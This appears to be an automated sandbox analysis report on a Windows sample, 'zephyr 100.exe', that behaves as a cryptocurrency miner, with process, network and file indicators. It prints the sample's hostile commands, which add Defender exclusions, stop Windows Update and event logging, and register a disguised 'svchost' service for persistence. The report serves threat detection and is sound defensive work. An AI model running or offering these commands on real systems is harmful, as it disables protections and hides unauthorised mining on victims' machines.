Malware Analysis Report

2025-03-14 22:29

Sample ID 240407-2d8qssgd2z
Target zephyr 100.exe
SHA256 0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8
Tags
evasion persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8

Threat Level: Likely malicious

The file zephyr 100.exe was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence

Creates new service(s)

Stops running service(s)

Launches sc.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-07 22:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-07 22:29

Reported

2024-04-07 23:02

Platform

win10-20240319-en

Max time kernel

33s

Max time network

44s

Command Line

"C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe"

Signatures

Creates new service(s)

persistence

Stops running service(s)

evasion

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe

"C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "svchost"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "svchost"

C:\ProgramData\RunDLL\taskhostw.exe

C:\ProgramData\RunDLL\taskhostw.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

\??\c:\windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\dialer.exe

dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ru.zephyr.herominers.com udp
FI 37.27.63.72:1123 ru.zephyr.herominers.com tcp

Files

memory/4520-4-0x000001D924650000-0x000001D924672000-memory.dmp

memory/4520-5-0x00007FFB9D2B0000-0x00007FFB9DC9C000-memory.dmp

memory/4520-6-0x000001D9244E0000-0x000001D9244F0000-memory.dmp

memory/4520-8-0x000001D9244E0000-0x000001D9244F0000-memory.dmp

memory/4520-10-0x000001D93CC90000-0x000001D93CD06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zotnjry0.yxf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4520-23-0x000001D9244E0000-0x000001D9244F0000-memory.dmp

memory/4520-46-0x000001D9244E0000-0x000001D9244F0000-memory.dmp

memory/4520-49-0x00007FFB9D2B0000-0x00007FFB9DC9C000-memory.dmp

memory/3892-50-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3892-53-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3892-57-0x00007FFBBAC40000-0x00007FFBBAE1B000-memory.dmp

memory/3892-58-0x00007FFBBA510000-0x00007FFBBA5BE000-memory.dmp

memory/3892-55-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3892-52-0x0000000140000000-0x000000014002B000-memory.dmp

memory/600-65-0x000002431C620000-0x000002431C64B000-memory.dmp

memory/600-67-0x000002431C620000-0x000002431C64B000-memory.dmp

memory/652-69-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/600-68-0x00007FFBBACE5000-0x00007FFBBACE6000-memory.dmp

memory/652-72-0x000001B247220000-0x000001B24724B000-memory.dmp

memory/740-79-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/912-82-0x000001FDABD00000-0x000001FDABD2B000-memory.dmp

memory/912-87-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/912-88-0x000001FDABD00000-0x000001FDABD2B000-memory.dmp

memory/648-96-0x0000023F49160000-0x0000023F4918B000-memory.dmp

memory/380-94-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/648-98-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/1088-103-0x000001BFB5DE0000-0x000001BFB5E0B000-memory.dmp

memory/1088-106-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/864-105-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/1132-108-0x000001FA69760000-0x000001FA6978B000-memory.dmp

memory/1204-114-0x0000023E4CD90000-0x0000023E4CDBB000-memory.dmp

memory/1212-122-0x0000022CA7460000-0x0000022CA748B000-memory.dmp

memory/1204-121-0x0000023E4CD90000-0x0000023E4CDBB000-memory.dmp

memory/1220-128-0x0000022716DD0000-0x0000022716DFB000-memory.dmp

memory/3892-132-0x00007FFBBAC40000-0x00007FFBBAE1B000-memory.dmp

memory/1212-138-0x0000022CA7460000-0x0000022CA748B000-memory.dmp

memory/1276-133-0x000001FD01E90000-0x000001FD01EBB000-memory.dmp

memory/1220-129-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/1212-127-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/1204-119-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/676-118-0x00007FFB9D2B0000-0x00007FFB9DC9C000-memory.dmp

memory/1132-112-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/864-100-0x0000020B7ECD0000-0x0000020B7ECFB000-memory.dmp

memory/380-93-0x0000021CC0790000-0x0000021CC07BB000-memory.dmp

memory/1004-85-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp

memory/1004-83-0x0000020529FB0000-0x0000020529FDB000-memory.dmp

C:\ProgramData\RunDLL\taskhostw.exe

MD5 af3706e699c90f1b5e1fdb5201e6d8ec
SHA1 2c219b9b3c90140d5e9361b1fa61130ca6dda281
SHA256 0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8
SHA512 1bfb95adc9aa0a3ac340cda9608bdc0c824fd82f61b63929c4dfaabe290b0cd8ffa05fd51886dd46a05a6603eebeb9f2a54c9eb3df146fda83f8720ce286789e

memory/740-75-0x0000028D87A90000-0x0000028D87ABB000-memory.dmp

memory/652-70-0x00007FFBBACE5000-0x00007FFBBACE6000-memory.dmp

memory/652-66-0x000001B247220000-0x000001B24724B000-memory.dmp

memory/600-63-0x000002431C5F0000-0x000002431C614000-memory.dmp

memory/676-142-0x000001C6D0210000-0x000001C6D0220000-memory.dmp

memory/3892-59-0x0000000140000000-0x000000014002B000-memory.dmp

memory/3892-51-0x0000000140000000-0x000000014002B000-memory.dmp

memory/676-148-0x000001C6D0210000-0x000001C6D0220000-memory.dmp

memory/1276-159-0x000001FD01E90000-0x000001FD01EBB000-memory.dmp

memory/1440-162-0x000001673E600000-0x000001673E62B000-memory.dmp

memory/676-319-0x000001C6D01A0000-0x000001C6D01BC000-memory.dmp

memory/676-318-0x00007FF6AC230000-0x00007FF6AC240000-memory.dmp

memory/912-442-0x000001FDABD00000-0x000001FDABD2B000-memory.dmp

memory/380-445-0x0000021CC0790000-0x0000021CC07BB000-memory.dmp

memory/676-448-0x000001C6D0210000-0x000001C6D0220000-memory.dmp

memory/2380-525-0x00007FFBBAC40000-0x00007FFBBAE1B000-memory.dmp

memory/2380-527-0x00007FFBBA510000-0x00007FFBBA5BE000-memory.dmp

memory/648-551-0x0000023F49160000-0x0000023F4918B000-memory.dmp

memory/912-557-0x000001FDABDA0000-0x000001FDABDCB000-memory.dmp

memory/1088-561-0x000001BFB5DE0000-0x000001BFB5E0B000-memory.dmp

memory/648-571-0x0000023F491C0000-0x0000023F491EB000-memory.dmp

memory/1088-576-0x000001BFB5E70000-0x000001BFB5E9B000-memory.dmp

memory/1132-579-0x000001FA697C0000-0x000001FA697EB000-memory.dmp